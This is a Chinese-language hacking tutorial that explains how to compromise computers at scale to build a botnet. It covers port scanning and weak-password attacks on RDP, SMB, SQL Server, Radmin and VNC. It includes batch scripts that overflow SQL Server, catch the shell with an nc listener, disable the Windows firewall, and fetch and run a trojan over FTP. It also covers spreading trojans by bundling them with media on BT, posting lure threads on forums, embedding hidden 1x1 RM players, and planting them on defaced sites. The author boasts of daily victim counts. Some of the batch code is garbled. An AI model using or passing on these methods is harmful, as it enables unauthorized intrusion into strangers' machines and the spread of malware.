
2023年11月18日發(作者:小虎隊愛歌詞)各端口抓肉雞的幾種方法.txt
1、掃3389端口抓肉雞(適合新手)(抓不了國外肉雞)
現在國內網絡上流傳著一種克隆版的XP,安裝后會默認開啟一個賬號為new,密碼為空的賬戶,而且基本上都是開著3389的,我們就可以利用這一點來抓肉雞。首先用端口掃描工具(如S掃)掃一段IP的3389端口,掃完后就直接用遠程桌面連接開放3389的機器(也可以把結果保存為文本文件,用批量生成3389連接的工具來連接),然后輸入賬號new登入,如果別人的電腦前沒人的話你就可以去你的空間下載你傳好的木馬安裝拉~~這種方法只針XP系統,如果遇到2000或者2003系統就不要試了呵呵。缺點也很明顯,如果別人不是用new賬號登入XP的,你再登入上去就會把他擠出去(XP只支持單用戶登入,用戶登入需要用工具開),或者電腦前有人你就不可能去打開IE下載木馬了。
2、掃135端口抓肉雞
首先先用端口掃描器掃一段IP的135端口,然后把結果保存,再用NTSCAN過濾有弱口令的機器,最后用recton開telnet傳馬。因為現在135和445端口都被防火墻屏蔽了,只能掃本地的135肉雞,要抓外地的只能用外地的135肉雞來掃。(詳細動畫可以去黑客網站搜索135)
3、掃445端口抓肉雞
和掃135抓肉雞差不多,首先先用端口掃描器掃一段IP的445端口,然后把結果保存,再用NTSCAN過濾有弱口令的機器,最后用啊D工具包開共享傳馬。因為現在135和445端口都被防火墻屏蔽了,只能掃本地的445肉雞,要抓外地的只能用外地的445肉雞來掃。(詳細動畫可以去黑客網站搜索445)
4、1433端口批量溢出抓肉雞
這個方法可以實現全自動抓雞,不過現在太多人搞,成功率已經不高了。
要用到的工具:S掃 批處理文件
首先先寫個批處理,打開記事本,把以下代碼復制修改后,儲存為掃描+溢出.bat文件
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in () do tcp %%i %%j 1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in () do sqlhello %%i 1433 556
還要新建一個,里面你要掃的IP段,格式為 ,中間是空格
1433是要掃描的端口,1000是掃描線程數 ,do sqlhello %%i 1433 556 這個里的XXX添你的IP,556是后面NC監聽的端口
然后再寫個批處理
@echo off
Nc -l -vv -p 556>
echo urname>>
echo password>>
echo bin>>(以2進制傳輸數據)
echo get (你的木馬的文件名,要放在根目錄下)>>
echo bye>>
net stop sharedaccess(關閉WINDOWS自帶防火墻)
ftp -s:
(也是填你木馬的文件名)
del
注意上面的代碼回車符別刪掉,要不然就沒法下你的馬了。
上
面的步驟都搞好后,就可以開始掃肉雞了。
先打開多個,然后再打開掃描+溢出.bat,然后你就可以去睡大覺了。自動掃描,掃描完后自動溢出,溢出后還自動下馬執行,爽吧!所以這里講詳細點,呵呵。還有42 21端口也可以這樣溢出,只要用這些端口的溢出工具就好了。
忘了說,上面的工具和批處理什么的都要放在同一個文件夾下。
5、掃1433抓肉雞之方法2
要用到的工具:端口掃描器 X-scan SQL綜合利用工具
上面我們說過了,1433溢出現在成功率已經不高了,所以我們可以用另一種方法。
開了1433端口的機器一般都裝了SQL,所以我們可以猜測SQL弱口令來抓1433肉雞。
首先先用端口掃描器掃一段IP的1433端口,然后結果保存為文本文件,接著用X-scan導入這些開了1433的IP,然后在掃描參數-全局設置-掃描模塊這一欄里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件設置-端口相關設置-待檢測端口這一欄,只填1433端口。然后就可以開始掃描了。掃描完成后會有個報告,列出了有弱口令的機器,然后打開SQL綜合利用工具,輸入你掃到的弱口令來連接,接著打開SQL綜合利用工具-利用目錄,上傳你的木馬,然后在用DOS命令執行你的木馬就OK了。
6、用WINNTAutoAttack掃SA弱口令抓肉雞
其實這個原理和上面一樣,效率也沒上面的高,只是想讓大家知道下,呵呵。
工具:WINNTAutoAttack SQL綜合利用工具
打開WINNTAutoAttack,找一段IP添上,然后只勾上設置下的僅對PING檢查成功的機器進行檢測和SQL列出密碼為空的SA賬號,接著開始掃描,掃完后,用 SQL綜合利用工具連上傳馬執行就好了。
7、掃4899空口令抓肉雞
工具:端口掃描器 4899探測器 Radmin
首先先用端口掃描器掃一段IP的4899端口,然后用4899探測器導入開了4899端口的IP,接著掃空令,最后用Radmin連接有空口令的機器,帶開文件管理,上傳的你木馬運行就OK了。
8、掃5900端口抓VNC肉雞
工具:VNC掃描器 VNC連接器
首先用VNC掃描器掃描一段IP,掃描格式為(掃描器文件名) -i 219.0.0.0-219.255.255.255(掃描IP段) -p 5900 -vnc -vv
掃描完成后會在掃描器所在的同一文件夾生成一個文本文件,打開后有一列IP,IP后面的有一些單詞比如patched,banned,vulnerable,只有單詞為vulnerable才能連接。接著就用VNC連接器連接,下面就不用多說了吧? 詳細動畫可以去黑客網站搜索VNC
接下來說說掛馬抓肉雞吧。方法有很多,比如BT掛馬、免費空間掛馬、迅雷掛馬等等,有些我也還不會,呵呵。下面就介紹幾種我會的。
1、BT掛馬
顧名思義,就是把你的木馬發布到BT網站讓人下載。當然如果只把單純的木馬文件發布上去效果肯定不好,
而且現在一般的BT網站也不讓發布EXE文件。所以我們需要一些隱藏的手法。我們可以先把木馬用捆綁器和一些電影、音樂、游戲捆綁在一起,再壓縮成RAR文件發布,誰在開始下載時會知道RAR里有木馬呢?當他費了好大勁下載完,打開發現是EXE的格式后,總有些菜鳥會不想辜負自己花費的時間而忍不住打開吧?尤其是下XXX片的時候 當然你也可以做個網頁木馬,然后把你網頁木馬的地址插入到你發布的文件中(不是所有文件都可以這樣的,我只知道RM和EXE文件可以插入),別人下載打開后同時也會帶開你的網頁木馬,如果他的系統沒有補供你網頁木馬所利用的漏洞的話,那他就會中你的馬了。有些朋友可能會想,我把木馬和其他文件捆綁后格式保持為那個文件(比如RM捆綁木馬后保持RM格式),那樣別人不就不會懷疑了嗎?呵呵,如果真有這樣的好事那我上面何不說把木馬和BT種子文件綁在一起發布,那樣你肉雞不抓瘋了才怪~~所以在這里說一下,木馬和其他文件捆綁后生成的文件只能為EXE格式的,除非你有你所捆綁文件的格式的溢出漏洞,那樣才能把生成后的文件格式保持為你所捆綁文件的格式。不過這樣的漏洞現在很少,大多都被補了,就算有別人也不一定會公開,為什么想想就知道了吧。在這里就說一個最近的RAR溢出漏洞,針對winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,運行綁了牧馬的RAR文件后就會中馬。此類木馬癥狀為:運行RAR文件后會彈出一個什么什么損壞還是錯誤的對話框,然后RAR文件體積變小,減少的體積就為木馬的體積。然后再次打開這個RAR文件一切正常,不會彈出錯誤對話框。在這里提醒下各位趕快更新下WINRAR版本,小心中馬哈。 :lol
2、免費空間掛馬
其實和BT差不多,就是把做好的木馬上傳到你申請的免費空間,然后到論壇發些誘惑性的帖子讓別人下載你的木馬。優點是不用像BT那樣做種子,那樣不僅要開著電腦,還影響網速。我這幾天就是這樣掛的,弄個免費空間,上傳個木馬,到2個XXX論壇發個帖子,每天睡前一頂,才掛了幾天,現在每天肉雞都保持在40-60只。而且大部分都是美國的,很容易吧? :lol :lol
3、用RM在論壇掛馬
首先你弄個只有幾秒鐘的RM文件,然后插入你的網頁木馬,接著上傳到你的空間,然后到一些支持插入RM連接的論壇發帖子,點插入real media 播放器,輸入你的RM牧馬地址,然后高度寬度都設為1(這部是為了保證隱蔽性:lol ),然后點發貼,這樣別人在瀏覽你的帖子就會運行你的RM木馬,而我們前面把高和寬設為1,在帖子里RM連接就看不到了。這樣別人就不知不覺中了我們的馬了:lol 好
像FLASH木馬也可以這樣的,我沒試過,大家可以去研究下。
4、入侵網站掛馬
這個我也不會,準備學習,在這里也提一下吧。比如你要入侵一個網站,首先得用工具掃一下漏洞,然后憑借這些漏洞上傳你做好的ASP網馬,然后運行你的ASP網馬,你就可以對這個網站的網頁進行一系列修改,比如在他主頁插入你的木馬地址,這樣別人在瀏覽這個網站的主頁時就會中你的馬了。中間過程也挺復雜了,我也只了解一點點,如果說錯了還請各位批評指正。